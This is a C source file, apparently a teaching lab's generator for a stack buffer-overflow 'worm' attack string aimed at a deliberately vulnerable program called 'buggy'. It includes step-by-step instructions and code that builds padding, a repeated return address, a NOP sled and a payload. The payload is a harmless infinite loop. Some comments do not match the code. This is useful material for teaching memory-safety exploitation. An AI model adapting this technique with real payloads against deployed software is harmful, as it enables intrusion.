#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>

/*
 * Instructions for building the worm attack file.
 *
 * (1) Compile this source file using "gcc -m32 -O2 -fno-stack-protector" and use an object-dump tool (e.g., otool) to extract
 *     the machine code values (in hex) for "worm_template", starting with the "leal" instruction
 *     and ending with the while loop.  Intialized "worm" to store this value and set "worm_size".
 *
 * (3) Create a text file that stores the 8-bit, ASCII string "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ".  This
 *     should be sufficiently large so as to cause the buffer overflow to overwrite the return address,
 *     have unique vaules in each location, and ensure that the values the get written into the 
 *     return address are an illegal address.
 *
 * (4) Instrument buggy.c (or use buggy-instrumented.c) to place the address of buf[0] in a global in printPrefix 
 *     and to print this value and the address of puts at the end of the program (after puts has been called at 
 *     least once).  Record these values and remove instrumentation.  You now have an *estimate* for the address 
 *     of buf, but its likely not perfect due to Heisenburg-principle problems (same is true if you run buggy 
 *     in gdb to get these values).  
 *
 * (5) Enter gdb with buggy using big-string file from step 3 as input.  Record the address that causes the 
 *     EXC_BAD_ACCESS exception (KERN_INVALID_ADDRESS).  
 *
 * (6) Recalling that the machine is little endian and referencing the ASCII code, determine the offset return address
 *     (that caused this exception) from the beginning of buf.  This will not suffer Heisenburg effects.
 *
 * (7) Run make-worm providing these values as input: the address of puts, the estmited address of buf, the buf-offset to
 *     the return address, and an uncertainty factor regarding your buf-address estmiate (e.g., 4 works for me, but larger
 *     values are fine).  Pipe the output to a file.  This is the attack string.
 *
 * (8) Run buggy providing the attack string as input and hope for a greating from Robert Morris.
 */

// compile with: -m32 -O2 for disassmble of worm()

void worm_template () {
  while (1);
}

char worm[100] = { 
  0xeb, 0xfe
};
int worm_size                      = 2; 

void write_worm (int buf_address, int offset_to_ra_in_buf, int uncertainty) {
  char  buf[10000], *c;
  int   cur, i, alignment_padding, worm_offset, worm_address;
  
  alignment_padding = 4 - (buf_address & 0x3);
  buf_address       = buf_address - uncertainty;
  worm_offset       = alignment_padding + uncertainty*2 + (offset_to_ra_in_buf % 4)*4 + 4;
  worm_address      = buf_address + worm_offset + uncertainty*2; 
  
  // write padding to align rest of buf to 4-byte boundary
  for (cur=0; cur<alignment_padding; cur++)
    buf[cur] = 0x20;

  // write worm address repeatedly hoping to smash stack return address
  while (cur<worm_offset) {
    *(int*)(&buf[cur]) = worm_address;
    cur+=4;
  }
  
  // write nop sled to compensate for address uncertainty for start of worm
  for (i=0; i<uncertainty*2; i++, cur++)
    buf[cur] = 0x90;
    
  // add the worm up to puts address
  for (i=0; i<worm_size; i++, cur++)
    buf[cur] = worm[i];
  
  // add a final '.' to terminate the vulnerable loop in buggy
  buf[cur] = '.';
  
  // write the attack string to stdout
  fwrite (buf, cur+1, 1, stdout);
}


int main (int argc, char** argv) {
  char usage[100] = "usage: make-worm-simple <buf-address-guess> <offset-to-ra-in-buf> <uncertainty>\n";
  int puts_address;
  int buf_address;
  int offset_to_ra_in_buf;
  int uncertainty;
  char *a2, *a3, *a4;
  
  if (argc != 4) {
    fprintf (stderr,"%s",usage);
    exit   (EXIT_FAILURE);
  }

  buf_address         = strtoll (argv[1], &a2, 0);
  offset_to_ra_in_buf = strtoll (argv[2], &a3, 0);
  uncertainty         = strtoll (argv[3], &a4, 0);
  
  if (a2==0 | *a2!=0 || a3==0 || *a3!=0 || a4==0 || *a4!=0) {
    fprintf (stderr, "%s", usage);
    exit   (EXIT_FAILURE);
  }
  
  write_worm (buf_address, offset_to_ra_in_buf, uncertainty);
}
